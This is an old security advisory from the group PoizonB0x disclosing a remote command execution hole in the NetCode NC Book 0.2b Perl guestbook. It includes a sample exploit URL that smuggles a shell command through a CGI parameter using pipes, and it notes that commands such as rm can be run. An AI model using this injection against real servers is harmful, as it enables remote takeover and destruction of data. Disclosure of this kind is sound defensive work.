------[ PoizonB0x Advisory#6 pb0x-06-08-2001 ]---------
-NAME: NetCode NC Book 0.2b remote command execution vulnerability.
-DESCRIPTION: NetCode's GuestBook. Find more info about it here: http://netcode.lgg.ru/vault/ncbook/
-PROBLEM: A pretty big hole in the main script of that guestbook leads to command execution on the remote server running this vulnerable perl script.
-EXPLOIT: ex.: http://target/cgi-bin/ncbook/book.cgi? action=default¤t=|ls - la/|&form_tid=996604045&prev=main.html&list_mess age_index=10
!The above line if given will output the file contents of the kernel dir. Also you can execute any commands (ls, cat, rm etc)
-AUTHORs: Discovery: digitalseed and ksenor Advisory: digitalseed
-DISCLAIMER: PoizonB0x may not be held liable for the use or potential effects of these programs or advisories, nor the content contained within. Use them at your own risk.
-COPYRIGHT: PoizonB0x Crew - www.poizonb0x.org (c) 2000-2001 L...Future Security...l
------[ PoizonB0x Advisory#1 pb0x-06-08-2001 ]---------